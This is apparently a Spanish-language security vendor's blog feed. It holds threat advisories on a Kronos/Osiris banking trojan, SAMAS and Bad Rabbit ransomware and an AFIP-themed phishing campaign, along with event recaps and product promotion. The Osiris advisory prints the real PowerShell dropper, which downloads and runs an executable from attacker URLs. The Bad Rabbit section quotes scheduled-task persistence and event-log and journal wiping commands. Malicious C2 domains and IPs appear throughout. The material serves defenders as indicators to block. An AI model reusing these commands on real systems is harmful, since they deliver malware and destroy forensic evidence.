UPDATE! Variante del Troyano Kronos (Osiris) peligroso troyano bancario

By | noticias, Sin categoría | No Comments

 

osiris

Desde nuestro SOC, seguimos analizando el comportamiento de la variante del troyano Kronos, la misma se conoce como Osiris.

 

ANÁLISIS Y COMPORTAMIENTO

Este es un troyano bancario tiene el siguiente comportamiento:

Utiliza inyecciones web G/P/L estilo Zeus, un keylogger para registrar las pulsaciones del teclado y un servidor VNC, aunque también presenta algunas peculiaridades, como el cifrado del tráfico para pasarlo por la red Tor hacia el servidor de mando y control.

La nueva variante del troyano kronos detectada y analizado por el S.O.C el dia 02/10, es un malware troyano polimórfico (cambia automáticamente su código cada cierto tiempo o con acciones determinadas del dispositivo), haciendo que sea más difícil para los antivirus detectar su firma, anteriormente este malware se consideraba del tipo bancario debido a su comportamiento, hoy en día está integrado con varias funciones maliciosas debido que consta de varios módulos que descarga de su servidor C&C(comando y control).

El principal medio de difusión utilizado es el spam mediante e-mail, adjuntando documentos de Microsoft Word o RTF específicamente diseñados con macros, los cuales tienen código malicioso powershell encriptado que descarga el malware y luego lo ejecuta. Utiliza la vulnerabilidad CVE-2017-11882, un desbordamiento de buffer conocido de Microsoft Office, permitiendo al hacker llevar a cabo una ejecución de código arbitrario sobre la máquina objetivo.

Detalles del archivo:

  • Nombre del archivo: Nuevo-contrato.doc
  • Tamaño del archivo: 128768 bytes
  • Tipo de archivo: Microsoft Office Word
  • MD5: 84ef0539de8e8b8f062b379ec603017b

RECOMENDACIONES:

Instalar el parche de de seguridad de Microsoft Office: https://www.microsoft.com/en-us/download/details.aspx?id=56250

Verificar si hay tráfico hacia los siguientes dominios, en caso tal, realizar un bloqueo de los mismos ya que es la manera de comunicación:

  • http://avast.dongguanmolds.com/abc.123
  • 28.14.219
  • 215.247.106

Tener el SO Actualizado a la ultima versión y con todos los parches de seguridad.

DNS Requests

Recomendamos bloquear las conexiones hacia la siguiente dirección:

studio2321.com

Response: A 69.163.216.158

HTTP Requests

Recomendamos aplicar bloqueos del proxy de navegación a las siguientes URLs:

URL: http://studio2321.com:9040/9QT9H0mr

DATA: GET /9QT9H0mr HTTP/1.1 Host: studio2321.com Connection: Keep-Alive

URL: http://studio2321.com:9040/9QT9H0mr/

DATA: GET /9QT9H0mr/ HTTP/1.1 Host: studio2321.com

URL: http://74.89.23.180:7080/

DATA: GET / HTTP/1.1

Cookie: 64048=mEe4DhPslSvzR+7C1uNb/1Qs26pFPDBHIgA7GMSXHm5435WfiV7EKFn6sHHsIqqHn D+cswdvXeMge+Wav7rcmQASvkiOsZrPdEaiCOjgL7g1JGwWGYqJwtTzvRy9nHbbs8h2oKV75I E+lYevrz4mDk9nUv9aEx19Mp2b79z8rqN53ysfUe3TVyIHCK4sZjDM8m9w764YMo4L1nZoqkkx lqLF2nsWWk2ovZ05ceP92f7eRs3+mjj2OeyEy0IFkGi+sbUfFGYwCRAGvJAYKl5UbOQNXNQnx Yvq73mHfnuHt3U97276yA/YAFSNyvoUbg3UbEjSeOMtx5q7J+PdDr5qQubURXmKeFBjMWgw 6lrfAtIqpYNiO2hjU7msFNIP9bt91f9lUL2yV2phbjBXpPCVSUEHLQLTQsMrn/4YRJBsZYDzYP5 N Host: 74.89.23.180:7080

Connection: Keep-Alive

Cache-Control: no-cache

URL: http://sightspansecurity.com/2aw9z1o

URL: http://landersmadden.com/mm405kH

URL: http://kingaardvark.com/HJJbLFNs

URL: http://interconformity.com/uMvDH9lmnH

URL: http://grupoembatec.com/2IH19v0

URL: http://motiondev.com.br/nmbSJF8d3O/

URL: http://aile.pub/VijPdPci/

URL: http://gidamikrobiyoloji.com/qMXm2AO/

URL: http://perkasa.undiksha.ac.id/wp-content/uploads/taTj65QDg/

 

CONOCE COMO PROTEGERTE:

Clientes SOC RAN: Si sos cliente de nuestro SOC ya estas protegido.

Clientes con Cylance: Están protegidos teniendo habilitada la política Fase 3 (AutoCuarentenamiento, Protección de Memoria y Control de Script).

Clientes con Proofpoint

Están protegidos a través del del Sandboxing y Heurística del producto.

Clientes con ClearSwift: 
Se recomienda el bloqueo de extensiones potencialmente peligrosas (.DOC, .DOCX, .XLS, etc).  Informando al usuario final la cuarentena del archivo para pedir la liberación bajo demanda previo análisis.

Cliente con McAfee: 
Se encuentran protegidos si tienen configurado correctamente el entorno TIE y ATD. De lo contrario es necesario cargar el extraDAT. consúltanos para más información.

Si tienes dudas al respecto no dudes en contactarnos más información y consultas: expertos@ransecurity.com 

 

MAS DATOS DE LA AMENAZA: 

El documento adjunto que contiene este troyano cuenta con un script embebido, que al ejecutarse, genera una conexión hacia las URLs del atacante para descargar un archivo que luego de su ejecución en el equipo de la víctima, genera la creación de los servicios y procesos maliciosos que recopilan la información que luego será enviada al atacante.

Código ejecutado:

  • powershell $mXP=new-object Net.WebClient;$QiV=’http://studio2321.com/9QT9H0mr@http://aile.pub/VijPdPci@http://motiondev.com.br/nmbS
  • JF8d3O@http://perkasa.undiksha.ac.id/wp-content/uploads/taTj65QDg@http://gidamikrobiyoloji.com/qMXm2AO’.Split(‘@’);$zwq= ‘532’;$ILh=$env:public+’\’+$zwq+’.exe';foreach($tpd in $QiV){try{$mXP.DownloadFile($tpd, $ILh);Invoke-Item $ILh;break;}catch{}}
  • C:\Users\Public\532.exe
  • “C:\Windows\SysWOW64\iwamregtaupe.exe”

Servicios creados

  • iwamregtaupe

Servicios iniciados

  • iwamregtaupe

Procesos

  • EXE PID: 360, Parent PID: 1240
  • exe PID: 1928, Parent PID: 360
  • exe PID: 2080, Parent PID: 1928
  • exe PID: 2308, Parent PID: 2080
  • exe PID: 2400, Parent PID: 2308
  • exe PID: 484, Parent PID: 388
  • exe PID: 2656, Parent PID: 484

 

Más información y consultas: expertos@ransecurity.com

RAN Security, Reconocido como MVP Cono Sur 2018 de McAfee

By | noticias, Sin categoría | No Comments

HEAD

En el marco de MPOWER, la conferencia anual de seguridad de McAfee en Las Vegas. RAN Security fue reconocido como partner del año LATAM región Cono Sur de McAfee ! . Queremos compartir este reconocimiento y agradecer a todos nuestros clientes y equipo de trabajo de RAN quienes hacen posible estos logros. Seguiremos comprometidos en ser los aliados #1 de las empresas en gestión y seguridad informática. En el video nuestro CEO Roberto Tursi recibiendo este gran reconocimiento en #MPOWER18 , Las Vegas

DpqBcvKUUAIM5TF

 

Más información y consultas: expertos@ransecurity.com

RAN TOUR 2018 – Resumen de las charlas

By | noticias, Sin categoría | No Comments

header

RESUMEN DE LAS CHARLAS SOBRE SOLUCIONES DE SEGURIDAD BASADAS EN INTELIGENCIA ARTIFICIAL

BLUVECTOR

CHARLA: El desafío del Malware sin archivos

Los actores malintencionados buscan los ataques que funcionan, los copian y los utilizan para explotar vulnerabilidades similares en nuevos objetivos. Debido a esto, el malware genera más malware. El malware sin archivos es un ejemplo actual de esta estrategia. Hasta el momento, en 2018, según el Instituto Ponemon, solo un tercio de todo el malware incluía técnicas sin archivos; sin embargo, el 77% de todos los ataques exitosos fueron parcial o completamente sin archivos. Esta tasa de éxito no es un secreto, y los autores de malware están invirtiendo cada vez más en métodos de ataque sin archivos. Para fines de 2018, se espera que cerca del 50% de todos los ataques usarán técnicas sin archivos.

SPEAKER: Travis Rosiek – CTO, Chief Technology Officer

PRESENTACIÓN: https://bluvectorcyber.sharepoint.com/:b:/r/Sales1/Shared%20Documents/RAN%20Presentation_BluVector_Final.pdf?csf=1

SOBRE BLUVECTOR: Combina y correlaciona numerosos motores de detección y análisis de malware, con Machine Learning Engine (MLE) para detectar con precisión el malware de día cero sin archivos y basados en archivos en tiempo real y garantizando la seguridad de red comprensiva para clientes de todos los grados de sofisticación

 

ATTIVO NETWORKS

CHARLA: Amenaza de engaño para una defensa activa

El panorama de amenazas está cambiando rápidamente y el enfoque de la ciber seguridad debe cambiar con el. En el mundo de hoy, donde las amenazas avanzadas y los expertos internos han demostrado que puede evadir las soluciones de prevención, las tecnologias de engaño son ideales para detectar de manera eficiente a los atacantes dentro de la red que han pasado por alto otros controles de seguridad. Ahora más que nunca, es fundamental reducir el tiempo de permanencia de los atacantes y adoptar una defensa proactiva que desvíe los ataques antes de que un adversario pueda causar daño. Descubra por qué la tecnología de engaño se está convirtiendo en un control de seguridad eficiente en una estrategia de seguridad multicapa y cómo se usa para detectar ataques conocidos y desconocidos de todos los vectores en todas las superficies de ataque. Explore cómo se usa el engaño para acelerar la respuesta a incidentes con alertas basadas en nivel de compromiso, correlación de ataque automatizada e integraciones nativas para el bloqueo de respuestas a incidentes, el aislamiento y la búsqueda de amenazas. Descubra por qué las organizaciones de todos los tamaños y la madurez de la infraestructura de seguridad obtienen enormes beneficios al cambiar la asimetría de un ataque. Vea una demostración de tecnología que incluirá ideas sobre las mejores prácticas para construir una Defensa activa basada en el engaño.

SPEAKER: Juan Carlos Vazquez – Regional Sales Manager

PRESENTACIÓN: https://www.dropbox.com/s/1a47dbqcb5vcc0r/Threat%20Deception%20for%20Modern%20Cyber%20Warfare_Espa%C3%B1ol%20v3_FINAL.pptx?dl=0

SOBRE ATTIVO NETWORKS: Attivo Networks® es el líder en el enfoque del uso del engaño, que permite detectar en tiempo real las intrusiones en redes, centros de datos públicos y privados y entornos especializados, como SCADA/ICS, redes financieras, Internet of Things (IoT) y entornos de punto de venta (POS).  A diferencia de los sistemas tradicionales de prevención, Attivo supone que el atacante está dentro de la red y mediante el despliegue de trampas de alta interacción y señuelos a nivel del punto final, decoys de tipo servidor y aplicativo en la red permite engañar a los actores maliciosos para que estos puedan ser detectados sin afectar los activos productivos. Sin dependencias de firmas ni de coincidencia de patrones de ataque o aprendizaje de tráfico, la plataforma de engaño BOTsink está diseñada para detectar con precisión y eficiencia el reconocimiento y movimiento lateral de amenazas avanzadas, robo de credenciales, propagación de ransomware, ataques MITM y ataques de phishing.

 

TENABLE

CHARLA: Cyber exposure en la era de la transformación digital – (2.00 PM 3.30 PM)

Las herramientas y enfoques que utilizan las organizaciones para comprender el riesgo cibernético ni siquiera funcionan en el anterior modelo de cliente/servidor, centros de datos locales y ciclo de vida lineal de desarrollo de software donde la complejidad es menor y hay mayor control sobre la seguridad. Un activo ya no es una simple computadora portátil o un mero servidor.Ahora, es una combinación compleja de plataformas y activos informáticos digitales que representan su superficie de ataque actual, en la que los activos en sí y sus vulnerabilidades asociadas se encuentran en plena expansión, se reducen y evolucionan, como un organismo vivo.

SPEAKER: Arturo Barquin – Business Development LATAM TENABLE

SOBRE TENABLE: La ciberseguridad es una de las amenazas existenciales de nuestro tiempo. Los nuevos tipos de dispositivos conectados y plataformas de computación, desde la nube al IoT, han explotado la superficie de ataque cibernético. Y más herramientas que recopilan más datos no equivalen a una perspectiva accionable para CISO, C-suite y la Junta Directiva. La vieja forma de simplemente escanear dispositivos de TI locales para detectar vulnerabilidades ya no es suficiente. Es hora de un nuevo enfoque.   Hoy más de 24.000 organizaciones de todo el mundo confían en nosotros para que las ayudemos a comprender y reducir el riesgo en materia de ciberseguridad. Nuestro objetivo es brindarle a cada organización, sin importar cuán grande o pequeña sea, la visibilidad y la perspectiva para responder cuatro preguntas fundamentales en todo momento: ¿Dónde estamos expuestos? ¿Dónde debemos priorizar en función del riesgo? ¿Reducimos nuestra exposición con el tiempo? ¿Cómo compararnos con nuestros competidores?. Somos la empresa de Cyber Exposure.

 

TRIPWIRE:

CHARLA: Controles fundamentales de seguridad:  la clave para defenderse de cyber ataques

Es común en seguridad mirar información de las noticias más recientes e imaginar que necesitamos una nueva herramienta brillante para enfrentar los ataques más innovadores, sin embargo, ese no suele ser el caso.

Muy a menudo, la mayor inversión en seguridad consiste en asegurarse que existen los controles de seguridad fundamentales: para encontrar y reparar vulnerabilidades, asegurarse de que los sistemas estén configurados de forma segura y monitorear los mismos para la detección de cambios contribuyen en gran medida a mantener una postura de seguridad sólida.

 SPEAKER: Rodrigo Zarraga – Tripwire SE LATAM & Caribe

SOBRE TRIPWIRE: Fabricante líder de soluciones que garantizan la integridad de archivos, cumplimiento y  excelencia operativa. Cn mas de 20 años innovando en el sector, es precursos en el monitoreo de integridad de archivos (FIM). Hoy, Tripwire ayuda a las organizaciones a lograr visibilidad en sus redes, reducir sus superficies de ataque y mantenerse al tanto de los cambios sospechosos, asegurando la integridad del sistema y de los datos. Su portafolio incluye gestión de configuración, gestión de integridad de archivos, descubrimiento de activos, gestión de vulnerabilidades y recopilación de registros.

 

ANOMALI:

CHARLA: Introducción a threat intelligence y cómo puede darle una ventaja adicional

¿Que es el threat intelligence? Como hacer que el conocimiento compartido ayude a su compañía

IMG-20181015-WA0041

IMG-20181016-WA0053IMG-20181015-WA0046

DpqBcvKUUAIM5TF

 

Más información y consultas: expertos@ransecurity.com

ALERTA DE SEGURIDAD> Nueva variante de Ransomware SAMAS

By | noticias, Sin categoría | No Comments

SAMSA RANSOMWARE2

RESUMEN

Ransomware-SAMAS es una conocida familia de ransomware cuya veta más destructiva fue renombrada a inicios de año, SAMAS cifra ciertos tipos de archivos y exige al usuario comprometido pagar al atacante un rescate para descifrar esos archivos.

Los atacantes obtienen acceso a un servidor externo de la organización y realizan un reconocimiento de los puntos finales en la red usando Microsoft Active Directory (csdv.exe).

Esta nueva variante contiene líneas de comandos vssadmin en el script.  Los key files generalmente siguen la nomenclatura: _PublicKey.keyxml. Estos key files se utilizan como argumento para el binario de cifrado principal samsam.exe, que lee las key files “.keyxml” y comienza el cifrado de las extensiones de archivos predefinidas.

Los atacantes también ejecutan otro script (generalmente llamado re1.bat) para eliminar los archivos de copia de seguridad presentes en los sistemas de punto final

MITIGACIÓN

Recomendamos:

  • Ningún equipo debe estar por debajo de las firmas: DAT 8976 y AMCORE 3427
  • Genere las reglas en VSE y ENS. Consulte los siguientes artículos para configurar las reglas de Protección de acceso en VirusScan Enterprise: KB81095 y Cómo crear una regla de protección de acceso definida por el usuario desde una consola VSE 8.x o ePO 5.x  KB54812
  • Los archivos adjuntos de e-mails externos deben escanearse primero con un antimalware y, si es necesario, eliminarse sin abrirlos.
  • Nunca haga clic en enlaces en correos electrónicos sin verificar la URL.
  • No abra archivos adjuntos de documentos de Office a menos que se lo solicite específicamente al remitente. Vea el asunto del correo electrónico o envíe un correo electrónico por separado para validar al remitente antes de abrir los archivos adjuntos.
  • Deshabilite los Macros en las aplicaciones de Microsoft Office.
  • Los usuarios finales deben hacer una copia de seguridad de los datos comerciales en las carpetas compartidas de la organización. Los datos que residen en los dispositivos del usuario se pueden perder de forma permanente en el caso de una infección de ransomware.
  • Reporte correos electrónicos sospechosos al equipo de seguridad.

 

Más información y consultas: expertos@ransecurity.com

Caso de éxito Centrify 2018

By | noticias, Sin categoría | No Comments

Grupo Argos fortalece la seguridad y reduce la complejidad en los centros de datos y la nube con Centrify Identity Platform

  • Sinopsis del desafío: Aumentar la visibilidad de la actividad contratada de TI para una administración más
    eficiente, así como el cumplimiento de la Ley SOX debido a las inversiones en los EE.UU. Aumentar la seguridad y reducir la tensión sobre el servicio de asistencia debido a las solicitudes de reinicio de contraseña, proporcionando a los empleados un inicio único de sesión (SSO) para las aplicaciones clave de la empresa e incorporando las Mac al Active Directory.

https://www.ransecurity.com/wp-content/uploads/2018/07/CASO-DE-EXITO-Grupo-Argos-2018.pdf

BlackBerry ha obtenido la puntuación más alta en los seis casos de uso del informe de Gartner Capacidades Críticas Para la Gestión de Movilidad de Alta Seguridad

By | noticias, Sin categoría | No Comments

Por segundo año consecutivo, BlackBerry ha obtenido la puntuación más alta en los seis casos de uso del informe de Gartner Capacidades Críticas Para la Gestión de Movilidad de Alta Seguridad

El informe ofrece una orientación para los compradores de TI, especialmente paras los de las empresas de industrias reguladas como servicios financieros, sanidad y energía entre otros, así como las agencias gubernamentales, que requieren una seguridad robusta. Y como la ciberseguridad se ha convertido hoy en día en una discusión a nivel consejo de administración dentro de empresas de todos los sectores, el informe se considera como lectura obligatoria para cualquier empresa donde se valoren los datos y las redes.

De los 15 proveedores evaluados, BlackBerry recibió:

    • La puntuación más alta en Seguridad de grado gubernamental (High-Security Government Grade)
    • Mayor puntuación en alta seguridad comercial (High-Security Commercial)
    • Mayor puntuación en datos compartidos (Shared data)
    • Mayor puntuación en dispositivos compartidos (Shared devices=
    • Mayor puntuación en No-Empleado (non-employee)
    • Mayor puntuación en BYO

BlackBerry también fue posicionado como líder en el Magic Quadrant de Gartner para EMM por segundo año consecutivo. Y también recibimos la puntuación más alta en dos casos de uso en el informe de Gartner 2017 Capacidades críticas para la gestión de la movilidad empresarial para las industrias reguladas y el soporte de dispositivos no administrados.

Con capacidades que van desde industrias reguladas que requieren alta seguridad, hasta empresas con menores necesidades de seguridad móvil que prefieren el enfoque más ligero de Mobile Application Management (MAM), BlackBerry Enterprise Mobility Suite (BEMS) le permite administrar y asegurar una amplia gama de necesidades empresariales.

 

Para obtener más información, descargue el informe completo de Gartner, Capacidades críticas para la gestión de movilidad de alta seguridad, 2017

  • Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

+INFORMACIÓN

http://blogs.blackberry.com/2017/08/blackberry-repeats-as-highest-scorer-in-all-six-out-of-six-use-cases-in-gartners-2017-critical-capabilities-for-high-security-mobility-management-report/

Ante cualquier duda o inquietud no dudes en contactarnos:

Julián Jimenez Yory

jjimenezyory@ransecurity.com

ATENCIÓN! Bad Rabbit lo que necesitas saber y extra.dat para detectarlo

By | noticias, Sin categoría | No Comments

BADRABBIT

¿QUÉ ES BAD RABBIT?

¿Escuchaste de Bad Rabbit?, la nueva cepa de ransomware, se disfrazó como una actualización de Flash, fue detectada por primera vez el 24 de octubre. Hasta la fecha, los sistemas atacados se han limitado principalmente a Rusia y Ucrania. El ransomware es la tercera gran propagación de malware este año: sigue las cepas de código malicioso WannaCry y NotPetya de mayor alcance. Esto es lo que sabemos sobre Bad Rabbit hasta el momento.

El ransomware Bad Rabbit se propaga a través de ataques “drive-by”, en este caso, el malware está disfrazado como un instalador de Adobe Flash. Cuando se abre el archivo de aspecto inocente, comienza a bloquear la computadora infectada. La descarga de Flash se ha instalado en sitios web que usan JavaScript inyectado en los archivos HTML o Java de los sitios web afectados. El malware no se instala automáticamente, lo que significa que se debe hacer clic para que funcione.

Si una persona hace clic en el instalador malicioso (y dado el número de actualizaciones de Flash emitidas, esto es muy probable), su computadora se bloquea. La nota de rescate y la página de pago demandan alrededor de $ 280 en Bitcoin y da un plazo de 40 horas para que se realicen los pagos.

¿A QUIÉN HA GOLPEADO?

La mayoría de los objetivos se encuentran en Rusia y Ucrania, afectando al Metro de Kiev, el aeropuerto de Odessa y principalmente webs de medio de comunicación, también se han presentado casos en Turquía y Alemania.

¿DE DÓNDE VIENE?

El análisis encontró que el ransomware explota el bloque de mensajes del servidor, que también se vio en NotPetya. Malwarebytes concluye que Bad Rabbit es “probablemente preparado por los mismos autores” como NotPetya.

Sin embargo, Bad Rabbit no parece ser tan sofisticado como las otras cepas de ransomware de este año. No explota la vulnerabilidad Eternal Blue de Windows almacenada por la NSA, para lo cual Microsoft ha emitido parches.

 

DETECCIÓN Y RECOMENDACIONES

Nombre del archivo:

630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da.exe

FlashUtil.exe

 

Tipo de archivo:

El malware inicia una línea de comandos con los siguientes valores:

Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR “C:\Windows\system32\cmd.exe /C Start \”\” \”C:\Windows\dispci.exe\” -id 1082924949 && exit”

“/ TN rheagal” se refiere a una cuenta del sistema con el nombre rhaegal utilizado para crear la tarea programada e iniciar el archivo ransomware

El malware utiliza los siguientes comandos para borrar registros de seguridad y eliminar el número de secuencia de actualización (USN) change journal, que se usa para recuperar archivos, por ejemplo:

Cmd /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

Actualmente hay tres muestras asociadas con esta campaña de ransomware, que representan el cuentagotas y el ejecutable principal:

630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93

579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

RECOMENDAMOS

+INFORMACIÓN

https://securingtomorrow.mcafee.com/mcafee-labs/badrabbit-ransomware-burrows-russia-ukraine/

Ante cualquier duda o inquietud no dudes en contactarnos:

Pablo Renzo

prenzo@ransecurity.com

RAN TOUR 2017

By | Sin categoría | No Comments

RAN TOUR 2017
Buenos Aires, Argentina. Septiembre 2017.
www.ransecurity.com
+Encuentro de profesionales de Seguridad TI + Charlas de primer nivle sobre tendencias de seguridad informática regional y mundial + Networking.

Sponsors: McAfee + Tenable + IBM Argentina + BlackBerry + Centrify + Boldon James + CyberArk + Nexsys Argentina Media Partner: IT Sitio

ATENCIÓN! Intento de estafa mediante un phishing AFIP (ARGENTINA)

By | noticias, Sin categoría | No Comments
ALERTAAFIP

Informamos a todos nuestros clientes que se encuentra activo un intento de estafa mediante un phishing, el cual distribuye un falso e-mail de AFIP (Administración Federal de Ingresos Públicos). Este e-mail contiene un archivo .doc, el cual usa un exploit que afecta la vulnerabilidad CVE 2017-8759 a http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759

El e-mail pretende ser de la AFIP y viene de un server que la IP asignada a Gualberto Larrauri. El mensaje del e-mail describe el adjunto como un manual para un portal de la AFIP, el mismo es un .zip que contiene un RTF con extensión .doc. Si bien contiene un .doc real, dentro también se encuentra el exploit CVE 2017-8759 que puede infectar y vulnerar una PC con SO Windows.

Una vez abierto el RTF genera una actividad en powershell que descarga un ejecutable malicioso en Windows que además crea persistencia en el registro de Windows.

phshingAFIP1 phshingAFIP2 phshingAFIP3

Cuando se analiza el tráfico se puede ver que hace varias request hacia dos IP

154.16.93.182 y 103.200.22.206

phshingAFIP4

Este tráfico malicioso generado incluye HTTP request para inyecciones de código Javascript, Powershell Script, y ejecutables de Windows por el puerto TCP 8007.

Los hashes son los siguientes:

SHA256 hash:  7bd46284dabf1f400102aa35e123eb2ffe2838560fbc016ba4f2cd376742004c

  • File size:  52,132 bytes
  • File type:  Zip archive
  • File name:  comprasAnexoII.zip
  • File description:  Email attachment

SHA256 hash:  4a07c6f26ac9feadbd78624d4e063dfed54e972772e5ee34c481bdb86c975166

  • File size:  286,981 bytes
  • File type:  Rich Text Format (RTF) file
  • File name:  comprasAnexoII.doc
  • File description:  RTF file with CVE-2017-8759 exploit

SHA256 hash:  610e6611b3b2e3bd85173cba76bf069fb7134b86f533141f79811fcc29d62b33

  • File size:  440,832
  • File type:  PE32 executable
  • File location:  hxxp://classupdate.punkdns.top:8007/txt/words.exe
  • File location:  C:\ProgramData\SystemMicrosoftDefender2.1\[random characters].exe
  • File description:  Follow-up malware, Neurevt.A (Betabot)

 

TRAFICO AL MOMENTO DE LA INFECCIÓN

  • 154.16.93.182 port 8007 – classupdate.punkdns.top:8007 – GET /txt/doc.txt
  • 154.16.93.182 port 8007 – classupdate.punkdns.top:8007 – GET /txt/accounts.hta
  • 154.16.93.182 port 8007 – classupdate.punkdns.top:8007 – GET /txt/pause.ps1
  • 154.16.93.182 port 8007 – classupdate.punkdns.top:8007 – GET /txt/words.exe

TRAFICO POST INFECCION:

  • 103.200.22.206 port 80 – av.bitdefenderesupdate.ru – POST /.av/logout.php
  • 103.200.22.206 port 80 – av.bitdefenderesupdate.ru – POST /.av/logout.php?id=[various numbers

 

RECOMENDACIONES:

Al no contar con el parche para la vulnerabilidad CVE 2017-8759 este ataque podría generar una infección, escalación de privilegios y otros efectos, por lo cual recomendamos:

  • Asegurar la aplicación de cada una de las actualizaciones automáticas de Windows, de lo contrario, actualizar a la última versión disponible del parche manualmente.
  • Mantener actualizados las soluciones de Antivirus y dispositivos Firewall.
  • Sensibilizar a los usuarios para evitar descarga de archivos adjuntos en correos sospechosos
  • Actualizar extra.DAT  en el ePO. Instrucciones para actualizar el extra.DAT https://kc.mcafee.com/corporate/index?page=content&id=KB67602

Ante cualquier duda o inquietud no dudes en contactarnos:

Pablo Renzo
prenzo@ransecurity.com

CONTACTO

E-mail: Soporte técnico: helpdesk@ransecurity.com Info: expertos@ransecurity.com
RANSecurity Argentina: (+54 11) 5353 9999
RANSecurity Chile: Tel: (+562) 3223 9532
RANSecurity Perú: Tel: (+51 1) 711 4764